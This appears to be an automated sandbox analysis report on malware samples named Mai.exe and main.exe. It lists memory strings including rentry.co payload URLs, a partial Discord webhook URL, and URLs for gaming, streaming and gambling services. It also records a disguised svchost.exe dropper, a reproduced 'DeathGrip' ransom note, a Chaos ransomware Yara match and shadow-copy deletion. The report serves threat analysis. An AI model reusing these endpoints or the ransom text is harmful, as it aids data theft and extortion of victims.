                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/5crcu/raw
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/5crcu/rawo
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/5crcu/rawz
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/5uu99/raw
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/5uu99/rawzyhttps://discord.com/api/webhooks/1258069699774906413/e-hqRvwqHXL2f7YpIV
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/pmpxa/raw
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/pmpxa/rawz
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2724986188.000001995FD9C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/u4tup/raw
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/u4tup/rawz
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)
                  Source: Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)z
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/P
                  Source: Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552235616.000001995E5FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
                  Source: Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552235616.000001995E599000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552235616.000001995E5FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
                  Source: Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#
                  Source: Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#r$Nrjr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stake.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stake.com))
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
                  Source: Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)z
                  Source: Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718035794.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                  Source: Mai.exe, 00000004.00000003.2295052810.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2374599976.000001995E373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2237855104.000001995E372000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2103277216.000001995E3C2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2281182162.000001995E3D9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2277018993.000001995F0BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2298258374.000001995F0C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2349801232.000001995F0CE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2459478257.000001995E3DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
                  Source: Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299599683.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276009216.000001995F0A0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2393139003.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/P
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                  Source: Mai.exe, 00000004.00000003.2455637329.000001995E65C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718278386.000001995E65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                  Source: Mai.exe, 00000004.00000003.2648357957.000001995E39B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2713846387.000001995E39F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                  Source: Mai.exe, 00000004.00000002.2731113524.00007FFBA4930000.00000002.00000001.01000000.0000001A.sdmp, Mai.exe, 00000004.00000002.2734983301.00007FFBA4E22000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.openssl.org/H
                  Source: Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                  Source: Mai.exe, 00000004.00000003.1508996634.000001995DCEF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510093739.000001995DD08000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2707057152.000001995D870000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510848812.000001995DD0A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1510093739.000001995DCEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                  Source: Mai.exe, 00000004.00000002.2735873578.00007FFBA5248000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.python.org/psf/license/
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085048419.000001995F4BC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2129293220.000001995F4E2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722853627.000001995F4E7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085109796.000001995F4CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                  Source: Mai.exe, 00000004.00000002.2714680779.000001995E3AF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)z
                  Source: Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.co
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
                  Source: Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2264338939.000001995E474000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2301099993.000001995E478000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2716427128.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2260377437.000001995E461000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2325267932.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2265641133.000001995E477000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2570619662.000001995E4E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: C:\Users\user\Desktop\main.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow created: window name: CLIPBRDWNDCLASS

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Found ransom note / readme
                  Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl\read_it.txtDropped file: DeathGrip Ransomware Attack | t.me/DeathGripRansomwareThis computer is attacked by russian ransomware community of professional black hat hackers. Your every single documents / details is now under observation of those hackers.If you want to get it back then you have to pay 1000$ for it.This Attack Is Done By Team RansomVerse You Can Find Us On Telegram @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware#DeathGripMalwareJump to dropped file
                  Yara detected Chaos Ransomware
                  Source: Yara matchFile source: Process Memory Space: 4wx72yFLka.exe PID: 7524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7676, type: MEMORYSTR
                  Source: Yara matchFile source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                  Deletes shadow drive data (may be related to ransomware)
